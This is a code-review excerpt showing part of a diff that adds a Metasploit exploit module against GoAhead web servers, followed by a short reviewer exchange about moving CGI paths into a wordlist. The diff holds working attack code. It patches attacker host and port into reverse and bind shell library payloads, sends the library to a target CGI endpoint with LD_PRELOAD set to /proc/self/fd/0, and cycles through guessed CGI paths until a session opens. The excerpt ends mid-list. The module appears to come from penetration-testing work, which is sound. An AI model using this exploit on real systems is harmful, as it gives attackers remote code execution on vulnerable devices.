modules/exploits/linux/http/goahead_ldpreload.rb

```diff
@@ -0,0 +1,391 @@
+    else
+      template_type = 'shellcode'
+      target.arch.each do |t_name|
+        @@payload_arch_mappings[t_name].each do |t_arch|
+          template_list << t_arch
+        end
+      end
+    end
+
+    # Remove any duplicates that mau have snuck in
+    template_list.uniq!
+
+    # Cycle through each top-level platform we know about
+    @@payload_platforms.each do |t_plat|
+
+      # Cycle through each template and yield
+      template_list.each do |t_arch|
+
+
+        wrapper_path = ::File.join(template_base, "goahead-cgi-#{template_type}-#{t_plat}-#{t_arch}.so.gz")
+        if ! ::File.exists?(wrapper_path)
+          raise RuntimeError.new("Missing executable template at #{wrapper_path}")
+        end
+
+        data = ''
+        ::File.open(wrapper_path, "rb") do |fd|
+          data = Rex::Text.ungzip(fd.read)
+        end
+
+        pidx = data.index('PAYLOAD')
+        if pidx
+          data[pidx, payload.encoded.length] = payload.encoded
+        end
+
+        if %W{reverse bind}.include?(template_type)
+          pidx = data.index("55555")
+          if pidx
+            data[pidx, 5] = datastore['LPORT'].to_s.ljust(5)
+          end
+        end
+
+        if 'reverse' == template_type
+          pidx = data.index("000.000.000.000")
+          if pidx
+            data[pidx, 15] = datastore['LHOST'].to_s.ljust(15)
+          end
+        end
+
+        vprint_status("Using payload wrapper 'goahead-cgi-#{template_type}-#{t_arch}'...")
+        yield(data)
+
+        # Introduce a small delay for the payload to stage
+        sleep(0.50)
+
+        # Short-circuit once we have a session
+        return if session_created?
+      end
+    end
+  end
+
+  # Start the shell train
+  def exploit
+    # Find a valid CGI target
+    target_uri = find_target_cgi
+    return unless target_uri
+
+    # Create wrappers for each potential architecture
+    cycle_possible_payloads do |wrapped_payload|
+
+      # Trigger the vulnerability and run the payload
+      trigger_payload(target_uri, wrapped_payload)
+      return if session_created?
+    end
+  end
+
+  # Determine whether the target is exploitable
+  def check
+    # Find a valid CGI target
+    target_uri = find_target_cgi
+    unless target_uri
+      return Exploit::CheckCode::Unknown
+    end
+    return Exploit::CheckCode::Vulnerable
+  end
+
+  # Upload and LD_PRELOAD execute the shared library payload
+  def trigger_payload(target_uri, wrapped_payload)
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri),
+      'vars_get' => {
+        'LD_PRELOAD' => '/proc/self/fd/0'
+      },
+      'data' => wrapped_payload
+    })
+
+    nil
+  end
+
+  # Find an exploitable CGI endpoint. These paths were identified by mining Sonar HTTP datasets
+  def find_target_cgi
+
+    target_uris = []
+    common_dirs = %W^
+/
+/cgi-bin/
+/cgi/
+^
+    common_exts = ["", ".cgi"]
+    common_cgis = %W^
```

Comment:
This feels like something that should be provided in `data/wordlists/goahead_cgis.txt` or maybe `data/wordlists/common_cgis.txt`.

Reply:
It may be worth pulling out into a wordlist, but we could use more feedback from the community about which URIs actually work in the wild.